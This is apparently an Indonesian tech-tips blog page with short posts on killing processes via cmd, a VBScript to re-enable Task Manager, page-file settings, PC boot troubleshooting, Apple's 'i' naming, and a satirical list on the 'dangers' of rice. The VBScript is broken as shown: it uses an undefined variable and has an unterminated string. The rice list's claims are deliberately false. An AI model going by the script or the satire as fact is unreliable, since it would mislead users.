Karena kata-kata tersebut merupakan sebuah kalimat yang berisi semua huruf dalam alfabet yang biasa digunakan untuk menguji mesin tik dan keyboard komputer, dan dalam aplikasi lain yang melibatkan semua huruf dalam abjad Inggris.

Selamat Mencoba.

by cyber4rt



Baca Selengkapnya......










Komputer anda sering heng karena ada proses aplikasi yang heng atau not responding, selain dengan aplikasi Taks Manager juga bisa dengan CMD. Kali ini saya membahas bagaimana cara menggunakan CMD....


Let's Begin...

1. masuk ke jendela cmd, dengan cara ketik start - run - cmd.

2. ketik tasklist, kemudian tekan enter

3. setelah itu, maka akan muncul sederet daftar proses yang sedang berjalandengan nomer PID nya.

4. cari nama yang akan anda hentikan, dan cari nomor PID-nya

5. jika sudah ada, maka ketikkan tskill nomor PID-nya, contoh tskill 3960 lalu enter


semoga membantu

Baca Selengkapnya......









Ini dibuat untuk situasi yang mendesak.
Saya akan memberikan Anda langkah demi langkah untuk mengaktifkan task manager Anda lagi.
banyak virus menyerang registri Anda dan task manager dinonaktifkan.
Jadi jika Anda ingin memungkinkannya coba langkah ini.
Persyaratan:
Wordpad, Textpad, Notepad, atau editor teks apapun.
Langkah:

1. Pertama, buka software editor teks.

2. Salin kode ini:

'Enable Task Manager
'Created by Alvin Leonardo. 2011
Option Explicit
'Declare variables
Dim WSHShell, reg1, reg2
On Error Resume Next
Set WSHShell = WScript.CreateObject("WScript.Shell")
reg1 = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
reg2 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"


WSHShell.RegDelete reg 'Delete Registry of "DisableTaskMgr" in HKCU
WSHShell.RegDelete reg2 'Delete Registry of "DisableTaskMgr" in HKLM
MsgBox "Done



3. Simpan dengan tipe file ". vbs".

4. Buka dan registri diperbaiki.


semoga bermanfaat


Baca Selengkapnya......








Waww penelitian terbaru tentang nasi sangat mengejutkan...! bagaimana tidak, bahan pokok masyarakat indonesia yaitu nasi ternyata ada bahayanya juga.berikut beberapa bahaya mengkonsumsi nasi...

1. NASI MENYEBABKAN KECANDUAN. Responden kami yang tidak makan nasi selama

sehari saja akan kelaparan dan merasa sangat ingin makan nasi lagi.

2. SETENGAH dari seluruh siswa Indonesia yang makan nasi nilainya ada di bawah rata-rata

kelas.

3. Suku-suku pada zaman batu yang tidak pernah makan nasi terbukti TIDAK PERNAH

mengidap tumor, Alzheimer, osteoporosis, ataupun Parkinson.

4. Dokter melarang bayi yang baru lahir untuk makan nasi. Hal ini menjadi bukti bahwa nasi

punya dampak berbahaya yang sudah dibuktikan oleh ilmu kedokteran.

5. Nasi yang kering biasa dimakan oleh ayam. Nah, sekarang anda perlu curiga dari mana flu

burung berasal.

6. Jumlah pemakan nasi di Indonesia jauh lebih banyak dibandingkan dengan jumlah pemakan

nasi di negara maju. Ini mungkin salah satu penyebab keterbelakangan pada negara ini.

7. Di warung-warung, biasanya KULI makan nasi dalam jumlah lebih banyak daripada kaum

eksekutif. Hal ini membuktikan bahwa makan nasi MENURUNKAN kemampuan ekonomi

seseorang.

9. Makan nasi dapat menyebabkan rasa haus alias MENYERAP air. Padahal tubuh kita sebagian

besar terdiri dari air.

10. Dalam kondisi tertentu, makan nasi MENINGKATKAN resiko kematian. Misalnya makan

nasi sambil menyetir mobil.

11. Pengidap DIABETES lebih dianjurkan makan kentang daripada nasi. Berarti nasi kurang baik

bagi kesehatan.

12. Makan nasi menyebabkan keinginan mengkonsumsi sayur dan lauk. Misalnya nasi bandeng

(nasi + bandeng goreng), nasi kucing (nasi + kucing goreng), dsb. Hal ini bisa menyebabkan

obesitas.

13. Nasi mengandung ZAT BESI yang konfigurasi elektron terluarnya 4s2. Zat lain yang elektron

terluarnya 4 adalah Racun ARSENIK (4p3), Batu batere TITANIUM (4s2), dan racun yang

menyerang Superman yaitu KRIPTON (4p6). Ini mengindikasikan bahwa nasi punya kesamaan

dengan zat-zat berbahaya lainnya.

15. Nasi DIMASAK dalam suhu lebih dari 100 derajat Celsius. Itu panas yang cukup untuk

membunuh orang
16. Anda pasti akan melihat ke atas lagi untuk membuktikan No. 8 dan No. 14 Tidak ada



Baca Selengkapnya......









Banyak dari kita tidak mengetahui apa makna sebenarnya dibalik huruf "i" pada produk-produk yang di rilis oleh perusahaan gadget raksasa, Apple. Ketika awal Apple mengeluarkan debut produk ‘i’ pertamanya, iMac, pendiri dan CEO Apple Steve Jobs mengatakan, “Itu merupakan perkawinan kesenangan internet dan kesederhanaan Macintosh”.


Jadi, ‘i’ mewakili internet dan ‘Mac’ mewakili Macintosh. Internet merupakan kata yang paling sering dikira diwakili ‘i’. Namun, internet bukanlah satu-satunya arti ‘i’ yang dimaksud Jobs.

Selain internet, ‘i’ juga berarti individual, merujuk pada sifat alami personal komputer dimana komputer tetap bisa dijalankan dan digunakan meskipun stand alone atau berdiri sendiri. Instruksi, komputer bekerja sesuai dengan instruksi dari user dan komputer juga dimaksudkan untuk tujuan pendidikan, yaitu serta informasi dan inspirasi.

Sejak debut iMac pada 1998, Apple mulai menciptakan beberapa rancangan serupa produk konsumen lainnya menggunakan ‘i,’ termasuk iPod, iPhone dan kini iPad.
Jadi bisa disimpulkan bahwa pemberian nama dengan huruf "i" disetiap produknya mencerminkan 3 (tiga) kata diatas


by spektrumdunia


Baca Selengkapnya......








Sebenarnya judul diatas tidaklah benar. Karena fungsi RAM dan fungsi Hardisk (HDD) jauh berbeda. Tetapi jika kita mau jeli melihat fungsi dan kinerja RAM dan HDD, maka ada persamaannya; yaitu sama2 tempat penyimpanan (memory) meski RAM bersifat memory sementara, sedang HDD bersifat semi permanen.
Kinerja PC yang RAM nya terbatas maka Pc terasa lambat. Silahkan baca ulang Fungsi RAM pada Komputer. Ada sedikit trik kuno agar fungsi RAM tidak terforsir, yaitu dengan mengalihkan “ingatan” RAM ke Hardisk.
Istilah Ngetrend-nya menambah Page File. Langsung aja kita mulai, dan silahkan anda ikuti panduanya di bawah ini:

Klik kanan my computer, lalu klik properti.

Klik tab advanced.

Kemudian Klik Tab visual effects.

Klik Advance, Lalu klik Change pada sub menu virtual memory.

Bagian akhir, adalah memilih drive c sebagai drive target, lalu isikan angka pada kolom custom size

Klik Set untuk menyimpan settingan virtual memory anda dan terakir klik OK untuk mengakiri semua proses penambahan page file

Saran:
Pada Initial Size = isikan dua kali lipat RAM terpasang pada PC anda. Jadi Jika RAM terpasang adalah 256 MB, maka isikan 512 MB (makin tinggi makin baik kok, tapi ingat konsumsi HD di drive C jangan sampai limit)

Pada Maximum Page = isikan dua kali lipat initial Size.


Selamat mencoba.


by sanganam



Baca Selengkapnya......









Jika anda mengalami Komputer Mati dengan tiba-tiba atau Tidak Mau Nyala coba tips ini (barangkali manjur)…

Buat sobat yang komputernya mati, tidak mau menyala sama sekali atau kadang hanya sampai tampilan awal kemudian berhenti / hang. Untuk mengetahui dan memecahkan masalah komputer tersebut, ada beberapa tips yang bisa dilakukan, sesuai dengan permasalahan yang dihadapi.

Komputer yang mati/ hang sebelum masuk ke sistem operasi penyebabnya bisa bermacam-macam. Berikut Tips yang bisa sobat praktekkan dan hampir selalu berhasil. Pilih yang sesuai dengan permasalahan yang dihadapi, atau lakukan secara bertahap.

* Cek Kabel, mulai dari Kabel yang masuk ke UPS/Stabilizer, kabel Power ke Monitor, kabel Monitor ke CPU dan kabel yang masuk ke Komputer. Pastikan pemasangannya telah sesuai dan kencang, serta arus listriknya ada dan cukup.

* Jika terdapat CD-ROM / DVD-ROM dan bisa dibuka/tutup, maka kemungkinan permasalahan ada di komputer (CPU), mulai dari kabel power yang masuk ke motherboard atau motherboard itu sendiri, cek pemasangan kabelnya.

* Jika dua langkah diatas sudah dicek, dan masih belum menyala, matikan komputer dan Reset BIOS di Motherboard. Caranya bisa dilihat di buku panduan motherboard, dan cari menu Reset BIOS. Biasanya untuk mereset BIOS dapat dilakukan pada Jumper 1 (JP1). Disana ada 3 pin, yang 2 diantaranya dihubungkan dengan sebuah konektor kecil. Untuk mereset, tinggal melepas dan memasang di 2 pin yang satunya. Misalnya 3 pin tersebut 1,2,3 dan pin 1 dan 2 sudah terhubung, maka untuk mereset tinggal melepas dan memasang di pin 2 dan 3. Biarkan sekitar 30 detik atau lebih kemudian kembalikan seperti semula. Nyalakan komputer.

* Jika BIOS telah di reset dan masih tidak menyala, coba lepas Baterai CMOS, yang ada di motherboard. Diamkan sekitar 1 menit, kemudian dipasang kembali dan nyalakan komputer. Jika baterai sudah cukup lama, lebih dari 3 tahun, ada baiknya diganti dengan yang baru. Apalagi jika jam di komputer sering tidak cocok.

* Jika kipas Processor / VGA berputar, tetapi komputer masih belum menyala, maka kemungkinan ada yang tidak beres dengan BIOS motherboard atau Motherboard memang sudah rusak. Mungkin BIOS perlu di Update, tetapi sebelum update, komputer harus bisa menyala (masuk BIOS) terlebih dahulu. Untuk melakukan hal itu, coba lepas kabel Hardisk, CD-ROM, Floppy. Kemudian, lepas Memori komputer (RAM) dan ganti di slot yang lain atau gunakan memori komputer lain. Hal ini mungkin harus diulangi sampai beberapa kali, hingga ada tanda-tanda kehidupan…

* Jika CPU sudah kelihatan bekerja, hardisk berputar dan lampu led CPU berkedip-kedip tetapi monitor tidak ada tampilannya, maka kumungkinan VGA ( Kartu Grafis) komputer yang bermasalah. Coba ganti dengan VGA lain atau cek VGA tersebut di komputer lain (Hal ini jika VGA tidak jadi satu dengan motherboard).

Jika dengan semua langkah diatas, komputer juga belum menyala, mungkin komputer perlu di service orang yang lebih ahli. Untuk mengetahui lebih detail permasalahan motherboard atau ingin menjadi teknisi, sebaiknya membeli sebuah alat khusus yang disebut PC Analyzer, yang memang dirancang untuk mengetahui kerusakan motherboard. Silahkan berbagi pengalaman anda mengenai komputer yang tiba-tiba mati dan tidak mau menyala.. semoga bermanfaat.

Informasi

CPU yang dimaksud diatas adalah Motherboard, Memori, CPU, Power Supply, Hardisk, Floppy dan komponen lainnya yang ada dalam Casing Komputer, selain monitor. Meskipun sebenarnya CPU adalah Central Processing Unit (Processor), misalnya Pentium4, AMD dsb. Hal ini untuk mempermudah saja.




semoga bermanfaat


Baca Selengkapnya......

About

Say Something About This.... Katakanlah yang benar untuk
sebuah kebenaran.